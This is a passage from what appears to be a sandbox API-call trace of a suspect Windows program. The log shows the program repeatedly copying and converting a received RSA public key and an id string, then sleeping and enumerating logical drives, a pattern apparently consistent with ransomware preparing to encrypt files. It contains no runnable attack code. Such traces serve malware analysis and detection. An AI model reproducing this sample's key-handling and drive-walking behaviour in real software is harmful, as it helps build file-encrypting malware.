KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0112.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74eff28 | out: hHeap=0x4970000) returned 1 [0112.937] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x43a) returned 0x7519840 [0112.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13f0a778, cbMultiByte=-1, lpWideCharStr=0x7519840, cchWideChar=541 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 541 [0112.937] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0112.937] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0112.937] lstrlenA (lpString="\",\"id\":\"") returned 8 [0112.937] lstrcpyA (in: lpString1=0x13f0ab78, lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0112.937] lstrcpyA (in: lpString1=0x13f0a778, lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.938] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3588 [0112.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x854) returned 0x74f21d8 [0112.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x74c3588, cbMultiByte=-1, lpWideCharStr=0x74f21d8, cchWideChar=1066 | out: lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 43 [0112.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74f9cc8 [0112.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0112.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3588 | out: hHeap=0x4970000) returned 1 [0112.939] lstrcpyW (in: lpString1=0x521cf0, lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0112.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f9cc8 | out: hHeap=0x4970000) returned 1 [0112.939] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0112.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x56) returned 0x74f3a18 [0112.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13f0a778, cbMultiByte=-1, lpWideCharStr=0x74f3a18, cchWideChar=43 | out: lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 43 [0112.939] lstrcpyW (in: lpString1=0x521cf0, lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0112.939] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0112.939] lstrlenW (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 40 [0112.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4488 | out: hHeap=0x4970000) returned 1 Thread: id = 95 os_tid = 0x618 [0113.568] timeGetTime () returned 0x114eeb2 [0113.568] GetLastError () returned 0x54f [0113.568] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3bc) returned 0x7519c88 [0113.568] GetCurrentThreadId () returned 0x618 [0113.568] SetLastError (dwErrCode=0x54f) [0113.568] Sleep (dwMilliseconds=0x1fbd0) [0126.709] Sleep (dwMilliseconds=0x3e8) [0127.774] GetLogicalDrives () returned 0x4 [0127.774] SetErrorMode (uMode=0x1) returned 0x0 [0127.774] PathFileExistsA (pszPath="C:\\") returned 1 [0127.775] SetErrorMode (uMode=0x0) returned 0x1 [0127.775] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0127.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x806) returned 0x7516fe8 [0127.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe00fe60, cbMultiByte=-1, lpWideCharStr=0x7516fe8, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0127.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0127.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 